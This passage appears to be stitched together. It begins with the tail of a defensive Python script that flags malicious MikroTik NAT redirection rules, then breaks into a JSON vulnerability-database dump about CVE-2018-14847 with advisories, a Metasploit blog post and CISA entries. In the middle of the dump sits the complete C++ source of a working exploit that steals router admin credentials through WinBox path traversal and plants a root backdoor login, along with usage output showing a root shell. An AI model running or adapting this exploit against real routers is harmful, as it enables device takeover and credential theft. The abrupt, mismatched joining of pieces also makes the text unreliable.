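        index, flags, body = m.groups()
        rule = dict(re.findall(r'([\w-]+)=("[^"]*"|\S*)', body))
        rule["_index"], rule["_flags"] = int(index), flags
        rules.append(rule)
    return rules


def suspicious_nat_rules(print_output):
    """Return the rules matching the pattern in the post: chain=dstnat,
    action=dst-nat, TCP on a Trickbot port, rewritten to port 80 on an
    address outside the LAN. A port-forward to a LAN host does not match;
    a disabled (X) copy of the malicious rule still does."""
    hits = []
    for rule in parse_nat_rules(print_output):
        if rule.get("chain") != "dstnat" or rule.get("action") != "dst-nat":
            continue
        try:
            target = ip_address(rule.get("to-addresses", ""))
        except ValueError:
            continue
        on_c2_port = rule.get("protocol") == "tcp" and rule.get("dst-port") in TRICKBOT_PORTS
        to_remote = not any(target in net for net in LAN_NETWORKS)
        if on_c2_port and rule.get("to-ports") == "80" and to_remote:
            hits.append(rule)
    return hits


def remediation_commands(rules):
    """The removal command the post gives, one per flagged rule index."""
    return ["/ip firewall nat remove numbers=%d" % r["_index"] for r in rules]


# Constructed sample; 198.51.100.0/24 and 203.0.113.0/24 are RFC 5737
# documentation ranges standing in for the router's WAN address and the C2.
SAMPLE_NAT_PRINT = """Flags: X - disabled, I - invalid, D - dynamic
 0    chain=srcnat action=masquerade out-interface=ether1
 1    chain=dstnat action=dst-nat to-addresses=203.0.113.7 to-ports=80 protocol=tcp dst-address=198.51.100.2 dst-port=449
 2    chain=dstnat action=dst-nat to-addresses=192.168.88.10 to-ports=443 protocol=tcp dst-port=443
 3 X  chain=dstnat action=dst-nat to-addresses=203.0.113.9 to-ports=80 protocol=tcp dst-address=198.51.100.2 dst-port=443
"""

if __name__ == "__main__":
    for ver in ("6.38.4", "6.40.8", "6.42.1", "6.43rc3"):
        print(ver, "vulnerable on channels:", cve_2018_14847_channels(ver) or "none")
    hits = suspicious_nat_rules(SAMPLE_NAT_PRINT)
    for rule in hits:
        print("suspicious rule %d%s: %s" % (rule["_index"], " (disabled)" if "X" in rule["_flags"] else "", rule))
    print("\n".join(remediation_commands(hits)))
```

Paste real `print` output into `SAMPLE_NAT_PRINT` (or import the module and call `suspicious_nat_rules` on it) and run it with `python3`. Two caveats are built in: a "< 6.42.1" comparison alone would flag a patched long-term build such as 6.40.8, so the version check is channel-aware and accepts the channel when you know it; and a disabled (`X`) copy of the redirection rule is still reported, since the post recommends removing the rule rather than leaving it in place.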
Such cross-domain visibility allows Microsoft 365 Defender to comprehensively detect and remediate Trickbot\u2019s end-to-end attack chain\u2014from malicious attachments and links it sends via emails to its follow-on activities in endpoints. Its rich set of tools like [advanced hunting](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/advanced-hunting-overview?view=o365-worldwide>) also lets defenders surface threats and gain insights for hardening networks from compromise.\n\nIn addition, working with the Microsoft Defender for IoT Research Team, RiskIQ identified compromised MikroTik routers acting as communication channels for Trickbot C2 and created detection logic to flag devices under threat actor control. [See RiskIQ\u2019s article](<https://community.riskiq.com/article/111d6005>).\n\nTo learn more about securing your IoT and OT devices, explore [Microsoft Defender for IoT](<https://azure.microsoft.com/services/iot-defender/>).\n\n**_David Atch_**_, Section 52 at Microsoft Defender for IoT_ \n**_Noa Frumovich_**_, Section 52 at Microsoft Defender for IoT_ \n**_Ross Bevington_**_, Microsoft Threat Intelligence Center (MSTIC)_\n\nThe post [Uncovering Trickbot\u2019s use of IoT devices in command-and-control infrastructure](<https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2022-03-16T15:00:00", "type": "mssecure", "title": "Uncovering 
Trickbot\u2019s use of IoT devices in command-and-control infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2022-03-16T15:00:00", "id": "MSSECURE:B4569A8CBDA7CA5A51F286861830C71B", "href": "https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-12-01T00:00:00", "type": "cisa_kev", "title": "MikroTik Router OS Directory Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2021-12-01T00:00:00", "id": "CISA-KEV-CVE-2018-14847", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "zdt": [{"lastseen": "2021-11-08T03:48:07", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2018-10-10T00:00:00", "type": "zdt", "title": "MicroTik RouterOS < 6.43rc3 - Remote Root Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2018-10-10T00:00:00", "id": "1337DAY-ID-31296", "href": "https://0day.today/exploit/description/31296", "sourceData": "/*\n# Exploit Title: RouterOS Remote Rooting\n# Exploit Author: Jacob Baines\n# Vendor Homepage: www.mikrotik.com\n# Software Link: https://mikrotik.com/download\n# Version: Longterm: 6.30.1 - 
6.40.7 Stable: 6.29 - 6.42 Beta: 6.29rc1 - 6.43rc3\n# Tested on: RouterOS Various\n# CVE : CVE-2018-14847\n \nBy the Way is an exploit coded in C++ that enables a root shell on Mikrotik devices running RouterOS versions:\n \nLongterm: 6.30.1 - 6.40.7\nStable: 6.29 - 6.42\nBeta: 6.29rc1 - 6.43rc3\n \nThe exploit can be found here: https://github.com/tenable/routeros/tree/master/poc/bytheway\n \nThe exploit leverages the path traversal vulnerability CVE-2018-14847 to extract the admin password and create an \"option\" package to enable the developer backdoor. Post exploitation the attacker can connect to Telnet or SSH using the root user \"devel\" with the admin's password.\n \nMikrotik patched CVE-2018-14847 back in April. However, until this PoC was written, I don't believe its been publicly disclosed that the attack can be levegered to write files. You can find Mikrotik's advisory here:\n \nhttps://blog.mikrotik.com/security/winbox-vulnerability.html\n \nNote that, while this exploit is written for Winbox, it could be ported to HTTP as long as you had prior knowledge of the admin credentials.\n \n# Usage Example\n \n[email\u00a0protected]:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251\nTrying 192.168.1.251...\nConnected to 192.168.1.251.\nEscape character is '^]'.\nPassword: \nLogin failed, incorrect username or password\n \nConnection closed by foreign host.\n[email\u00a0protected]:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251\n \n \u2554\u2557 \u252c \u252c \u250c\u252c\u2510\u252c \u252c\u250c\u2500\u2510 \u2566 \u2566\u250c\u2500\u2510\u252c \u252c\n \u2560\u2569\u2557\u2514\u252c\u2518 \u2502 \u251c\u2500\u2524\u251c\u2524 \u2551\u2551\u2551\u251c\u2500\u2524\u2514\u252c\u2518\n \u255a\u2550\u255d \u2534 \u2534 \u2534 \u2534\u2514\u2500\u2518 \u255a\u2569\u255d\u2534 \u2534 \u2534 \n \n[+] Extracting passwords from 192.168.1.251:8291\n[+] Searching for administrator credentials \n[+] Using credentials - admin:lol\n[+] Creating 
/pckg/option on 192.168.1.251:8291\n[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291\n[+] There's a light on\n[email\u00a0protected]:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251\nTrying 192.168.1.251...\nConnected to 192.168.1.251.\nEscape character is '^]'.\nPassword: \n \n \nBusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)\nEnter 'help' for a list of built-in commands.\n \n# uname -a\nLinux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown\n# cat /rw/logs/VERSION\nv6.38.4 Mar/08/2017 09:26:17\n# Connection closed by foreign host.\n*/\n#include <sstream>\n#include <cstdlib>\n#include <iostream>\n#include <boost/cstdint.hpp>\n#include <boost/program_options.hpp>\n \n#include \"winbox_session.hpp\"\n#include \"winbox_message.hpp\"\n#include \"md5.hpp\"\n \nnamespace\n{\n const char s_version[] = \"By the Way 1.0.0\";\n \n /*!\n * Parses the command line arguments. The program will always use two\n * parameters (ip and winbox port) but the port will default to 8291 if\n * not present on the CLI\n *\n * \\param[in] p_arg_count the number of arguments on the command line\n * \\param[in] p_arg_array the arguments passed on the command line\n * \\param[in,out] p_ip the ip address to connect to\n * \\param[in,out] p_winbox_port the winbox port to connect to\n * \\return true if we have valid ip and ports. 
false otherwise.\n */\n bool parseCommandLine(int p_arg_count, const char* p_arg_array[],\n std::string& p_ip, std::string& p_winbox_port)\n {\n boost::program_options::options_description description(\"options\");\n description.add_options()\n (\"help,h\", \"A list of command line options\")\n (\"version,v\", \"Display version information\")\n (\"winbox-port,w\", boost::program_options::value<std::string>()->default_value(\"8291\"), \"The winbox port\")\n (\"ip,i\", boost::program_options::value<std::string>(), \"The ip to connect to\");\n \n boost::program_options::variables_map argv_map;\n try\n {\n boost::program_options::store(\n boost::program_options::parse_command_line(\n p_arg_count, p_arg_array, description), argv_map);\n }\n catch (const std::exception& e)\n {\n std::cerr << e.what() << \"\\n\" << std::endl;\n std::cerr << description << std::endl;\n return false;\n }\n \n boost::program_options::notify(argv_map);\n if (argv_map.empty() || argv_map.count(\"help\"))\n {\n std::cerr << description << std::endl;\n return false;\n }\n \n if (argv_map.count(\"version\"))\n {\n std::cerr << \"Version: \" << ::s_version << std::endl;\n return false;\n }\n \n if (argv_map.count(\"ip\") && argv_map.count(\"winbox-port\"))\n {\n p_ip.assign(argv_map[\"ip\"].as<std::string>());\n p_winbox_port.assign(argv_map[\"winbox-port\"].as<std::string>());\n return true;\n }\n else\n {\n std::cerr << description << std::endl;\n }\n \n return false;\n }\n \n /*!\n * This function uses the file disclosure vulnerability, CVE-2018-14847, to\n * download the user database from /flash/rw/store/user.dat\n *\n * \\param[in] p_ip the address of the router to connect to\n * \\param[in] p_winbox_port the winbox port to connect to\n * \\return a string containing the user.dat data or an empty string on error\n */\n std::string getPasswords(const std::string& p_ip, const std::string& p_winbox_port)\n {\n std::cout << \"[+] Extracting passwords from \" << p_ip << \":\" << p_winbox_port << 
std::endl;\n Winbox_Session winboxSession(p_ip, p_winbox_port);\n if (!winboxSession.connect())\n {\n std::cerr << \"[!] Failed to connect to the remote host\" << std::endl;\n return std::string();\n }\n \n WinboxMessage msg;\n msg.set_to(2, 2);\n msg.set_command(7);\n msg.set_request_id(1);\n msg.set_reply_expected(true);\n msg.add_string(1, \"//./.././.././../flash/rw/store/user.dat\");\n winboxSession.send(msg);\n \n msg.reset();\n if (!winboxSession.receive(msg))\n {\n std::cerr << \"[!] Error receiving an open file response.\" << std::endl;\n return std::string();\n }\n \n boost::uint32_t sessionID = msg.get_session_id();\n boost::uint16_t file_size = msg.get_u32(2);\n if (file_size == 0)\n {\n std::cerr << \"[!] File size is 0\" << std::endl;\n return std::string();\n }\n \n msg.reset();\n msg.set_to(2, 2);\n msg.set_command(4);\n msg.set_request_id(2);\n msg.set_reply_expected(true);\n msg.set_session_id(sessionID);\n msg.add_u32(2, file_size);\n winboxSession.send(msg);\n \n msg.reset();\n if (!winboxSession.receive(msg))\n {\n std::cerr << \"[!] Error receiving a file content response.\" << std::endl;\n return std::string();\n }\n \n return msg.get_raw(0x03);\n }\n \n /*!\n * Looks through the user.dat file for an enabled administrative account that\n * we can use. 
Once a useful account is found the password is decrypted.\n *\n * \\param[in] p_user_dat the user.dat file data\n * \\param[in,out] p_username stores the found admin username\n * \\param[in,out] p_password stores the found admin password\n * \\return true on success and false otherwrise\n */\n bool get_password(const std::string p_user_dat, std::string& p_username, std::string& p_password)\n {\n std::cout << \"[+] Searching for administrator credentials \" << std::endl;\n \n // the dat file is a series of nv::messages preceded by a two byte length\n std::string dat(p_user_dat);\n while (dat.size() > 4)\n {\n boost::uint16_t length = *reinterpret_cast<const boost::uint16_t*>(&dat[0]);\n if (dat[2] != 'M' || dat[3] != '2')\n {\n // this is mild insanity but the .dat file messages don't line\n // up properly if a new user is added or whatever.\n dat.erase(0, 1);\n continue;\n }\n dat.erase(0, 4);\n length -= 4;\n \n if (length > dat.size())\n {\n return false;\n }\n \n std::string entry(dat.data(), length);\n dat.erase(0, length);\n \n WinboxMessage msg;\n msg.parse_binary(entry);\n \n // we need an active admin account\n // 0x2 has three groups: 1 (read), 2 (write), 3 (full)\n if (msg.get_u32(2) == 3 && msg.get_boolean(0xfe000a) == false)\n {\n p_username.assign(msg.get_string(1));\n \n std::string encrypted_pass(msg.get_string(0x11));\n if (!encrypted_pass.empty() && msg.get_u32(0x1f) != 0)\n {\n std::string hash_this(p_username);\n hash_this.append(\"283i4jfkai3389\");\n \n MD5 md5;\n md5.update(hash_this.c_str(), hash_this.size());\n md5.finalize();\n std::string md5_hash(md5.getDigest());\n \n for (std::size_t i = 0; i < encrypted_pass.size(); i++)\n {\n boost::uint8_t decrypted = encrypted_pass[i] ^ md5_hash[i % md5_hash.size()];\n if (decrypted == 0)\n {\n // a null terminator! 
We did it.\n return true;\n }\n p_password.push_back(decrypted);\n }\n p_password.clear();\n }\n }\n }\n return false;\n }\n}\n \n/*!\n * This function creates the file /pckg/option on the target. This will enable\n * the developer login on Telnet and SSH. Oddly, you'll first need to log in\n * to Telnet for SSH to work, but I digress...\n *\n * \\param[in] p_ip the ip address of the router\n * \\param[in] p_port the port of the jsproxy we'll connect to\n * \\param[in] p_username the username we'll authenticate with\n * \\param[in] p_password the password we'll authenticate with\n * \\return true if we successfully created the file.\n */\nbool create_file(const std::string& p_ip, const std::string& p_port,\n const std::string& p_username, const std::string& p_password)\n{\n Winbox_Session mproxy_session(p_ip, p_port);\n if (!mproxy_session.connect())\n {\n std::cerr << \"[-] Failed to connect to the remote host\" << std::endl;\n return false;\n }\n \n boost::uint32_t p_session_id = 0;\n if (!mproxy_session.login(p_username, p_password, p_session_id))\n {\n std::cerr << \"[-] Login failed.\" << std::endl;\n return false;\n }\n \n std::cout << \"[+] Creating /pckg/option on \" << p_ip << \":\" << p_port << std::endl;\n \n WinboxMessage msg;\n msg.set_to(2, 2);\n msg.set_command(1);\n msg.set_request_id(1);\n msg.set_reply_expected(true);\n msg.set_session_id(p_session_id);\n msg.add_string(1, \"//./.././.././../pckg/option\");\n mproxy_session.send(msg);\n \n msg.reset();\n mproxy_session.receive(msg);\n if (msg.has_error())\n {\n std::cout << \"[-] \" << msg.get_error_string() << std::endl;\n return false;\n }\n \n std::cout << \"[+] Creating /flash/nova/etc/devel-login on \" << p_ip << \":\" << p_port << std::endl;\n msg.reset();\n msg.set_to(2, 2);\n msg.set_command(1);\n msg.set_request_id(2);\n msg.set_reply_expected(true);\n msg.set_session_id(p_session_id);\n msg.add_string(1, \"//./.././.././../flash/nova/etc/devel-login\");\n mproxy_session.send(msg);\n \n 
msg.reset();\n mproxy_session.receive(msg);\n if (msg.has_error())\n {\n std::cout << \"[-] \" << msg.get_error_string() << std::endl;\n return false;\n }\n \n return true;\n}\n \nint main(int p_argc, const char** p_argv)\n{\n std::string ip;\n std::string winbox_port;\n if (!parseCommandLine(p_argc, p_argv, ip, winbox_port))\n {\n return EXIT_FAILURE;\n }\n \n std::cout << std::endl;\n std::cout << \" \u2554\u2557 \u252c \u252c \u250c\u252c\u2510\u252c \u252c\u250c\u2500\u2510 \u2566 \u2566\u250c\u2500\u2510\u252c \u252c\" << std::endl;\n std::cout << \" \u2560\u2569\u2557\u2514\u252c\u2518 \u2502 \u251c\u2500\u2524\u251c\u2524 \u2551\u2551\u2551\u251c\u2500\u2524\u2514\u252c\u2518\" << std::endl;\n std::cout << \" \u255a\u2550\u255d \u2534 \u2534 \u2534 \u2534\u2514\u2500\u2518 \u255a\u2569\u255d\u2534 \u2534 \u2534 \" << std::endl;\n std::cout << std::endl;\n \n // step one - do the file disclosure\n std::string user_dat(getPasswords(ip, winbox_port));\n if (user_dat.empty())\n {\n return EXIT_FAILURE;\n }\n \n // step two - parse the password\n std::string admin_username;\n std::string admin_password;\n if (!get_password(user_dat, admin_username, admin_password))\n {\n std::cout << \"[-] Failed to find admin creds. 
Trying default.\" << std::endl;\n admin_username.assign(\"admin\");\n admin_password.assign(\"\");\n }\n \n std::cout << \"[+] Using credentials - \" << admin_username << \":\" << admin_password << std::endl;\n \n // step three - create the file\n if (!create_file(ip, winbox_port, admin_username, admin_password))\n {\n return EXIT_FAILURE;\n }\n \n std::cout << \"[+] There's a light on\" << std::endl;\n return EXIT_SUCCESS;\n}\n", "sourceHref": "https://0day.today/exploit/31296", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "cve": [{"lastseen": "2023-06-23T14:27:52", "description": "MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2018-08-02T07:29:00", "type": "cve", "title": "CVE-2018-14847", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2019-03-07T14:12:00", "cpe": ["cpe:/o:mikrotik:routeros:6.42"], "id": 
"CVE-2018-14847", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-14847", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:o:mikrotik:routeros:6.42:*:*:*:*:*:*:*"]}], "rapid7blog": [{"lastseen": "2020-11-06T20:46:05", "description": "## Insert 'What Year Is It' meme\n\n\n\n[h00die](<https://github.com/h00die>) contributed the [Mikrotik unauthenticated directory traversal file read](<https://github.com/rapid7/metasploit-framework/pull/14280>) auxiliary gather module, largely a port of the PoC by [Ali Mosajjal](<https://github.com/mosajjal>). The vulnerability [CVE-2018-14847](<https://attackerkb.com/topics/oOoUGd0y46/cve-2018-14847?referrer=blog>) allows any file on the router to be read through the Winbox server in RouterOS, because the server trusts the file path supplied by the Winbox client without validating it. The `auxiliary/gather/mikrotik_winbox_fileread` module exploits this vulnerability by communicating with the Winbox server on port 8291 and requesting the system user database file. One would hope all vulnerable MikroTik devices have been patched by now, but if you happen to discover a vulnerable instance it's time to dump the credentials! Vulnerable versions of MikroTik RouterOS are:\n\n * (bugfix) 6.30.1-6.40.7\n * (current) 6.29-6.42\n * (RC) 6.29rc1-6.43rc3\n\n## WordPress plugin giveth\n\nSecurity researcher [mslavco](<https://twitter.com/mslavco/>) discovered an unauthenticated, time-based blind SQL injection in the Loginizer WordPress plugin\u2019s `log` parameter. [h00die](<https://github.com/h00die>) contributed the [WordPress Loginizer log SQLi Scanner](<https://github.com/rapid7/metasploit-framework/pull/14319>) auxiliary scanner module that exploits the vulnerability ([CVE-2020-27615](<https://attackerkb.com/topics/9fQo2hkkZm/cve-2020-27615?referrer=blog>)) to extract user credentials and then store them in the Metasploit database. 
Loginizer versions 1.6.3 and earlier are vulnerable to the `auxiliary/scanner/http/wp_loginizer_log_sqli` module, and it is important to note that successful exploitation requires WordPress 5.4 (or newer) or 5.5 (or newer).\n\n## New modules (2)\n\n * [Mikrotik Winbox Arbitrary File Read](<https://github.com/rapid7/metasploit-framework/pull/14280>) by h00die and mosajjal, which exploits [CVE-2018-14847](<https://attackerkb.com/topics/oOoUGd0y46/cve-2018-14847?referrer=blog>)\n * [WordPress Loginizer log SQLi Scanner](<https://github.com/rapid7/metasploit-framework/pull/14319>) by h00die, mslavco, and red0xff, which exploits [CVE-2020-27615](<https://attackerkb.com/topics/9fQo2hkkZm/cve-2020-27615?referrer=blog>)\n\n## Enhancements and features\n\n * PR [#14252](<https://github.com/rapid7/metasploit-framework/pull/14252>) by [h00die](<https://github.com/h00die>) updates the Avira password gather to store captured credentials in the database and adds support for exporting `Raw-MD5u` hashes, which are used by Avira to store passwords.\n * PR [#14270](<https://github.com/rapid7/metasploit-framework/pull/14270>) by [Jeffrey Martin](<https://github.com/jmartin-r7>) adds guards to notify users of incorrect or missing encoders while allowing the encoding process to continue.\n * PR [#14282](<https://github.com/rapid7/metasploit-framework/pull/14282>) by [h00die](<https://github.com/h00die>) enhances the Metasploit loader to provide more accurate error messages when an external module fails to load.\n * PR [#14297](<https://github.com/rapid7/metasploit-framework/pull/14297>) by [Steve Passino](<https://github.com/spassino>) updates `auxiliary/scanner/http/zabbix_login` to support Zabbix versions 3.x, 4.x, and 5.x up to the latest 5.2 LTS release.\n\n## Bugs fixed\n\n * PR [#14222](<https://github.com/rapid7/metasploit-framework/pull/14222>) by [JRodriguez556](<https://github.com/JRodriguez556>) replaces calls to the deprecated `URI.encode` function with calls to 
`Rex::Text.uri_encode` in `exploits/multi/http/php_fpm_rce`.\n * PR [#14323](<https://github.com/rapid7/metasploit-framework/pull/14323>) by [Spencer McIntyre](<https://github.com/zeroSteiner>) fixes an issue in `auxiliary/gather/enum_dns` that only affects zone transfer enumeration (AXFR) by using the nameservers specified in the datastore `NS` option.\n * PR [#14326](<https://github.com/rapid7/metasploit-framework/pull/14326>) by [Christopher Granleese](<https://github.com/cgranleese-r7>) fixes an issue in `store_loot` in which certain data types were not properly stored and resulted in a subsequent stack trace.\n * PR [#14350](<https://github.com/rapid7/metasploit-framework/pull/14350>) by [Mat\u00fa\u0161 Bursa](<https://github.com/matusso>) added the missing `nasm` dependency to ensure that `tools/exploit/nasm_shell.rb` works as expected when running inside of Docker.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.14...6.0.15](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-29T13%3A21%3A34%2B00%3A00..2020-11-05T10%3A12%3A21-06%3A00%22>)\n * [Full diff 6.0.14...6.0.15](<https://github.com/rapid7/metasploit-framework/compare/6.0.14...6.0.15>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2020-11-06T19:55:51", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-14847", "CVE-2020-27615"], "modified": "2020-11-06T19:55:51", "id": "RAPID7BLOG:B6B5A95341EBF4792BAD1B887E8F35DC", "href": "https://blog.rapid7.com/2020/11/06/metasploit-wrap-up-86/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-01-26T11:34:49", "description": "CISA has added five new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. 
These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Remediation Due Date** \n---|---|--- \n[CVE-2020-11261](<https://nvd.nist.gov/vuln/detail/CVE-2020-11261>) | Qualcomm Multiple Chipsets Improper Input Validation Vulnerability | 06/01/2022 \n[CVE-2018-14847](<https://nvd.nist.gov/vuln/detail/CVE-2018-14847>) | MikroTik Router OS Directory Traversal Vulnerability | 06/01/2022 \n[CVE-2021-37415](<https://nvd.nist.gov/vuln/detail/CVE-2021-37415>) | Zoho ManageEngine ServiceDesk Authentication Bypass Vulnerability | 12/15/2021 \n[CVE-2021-40438](<https://nvd.nist.gov/vuln/detail/CVE-2021-40438>) | Apache HTTP Server-Side Request Forgery (SSRF) | 12/15/2021 \n[CVE-2021-44077](<https://nvd.nist.gov/vuln/detail/CVE-2021-44077>) | Zoho ManageEngine ServiceDesk Plus Remote Code Execution | 12/15/2021 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). 
\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/12/01/cisa-adds-five-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-01T00:00:00", "type": "cisa", "title": "CISA Adds Five Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 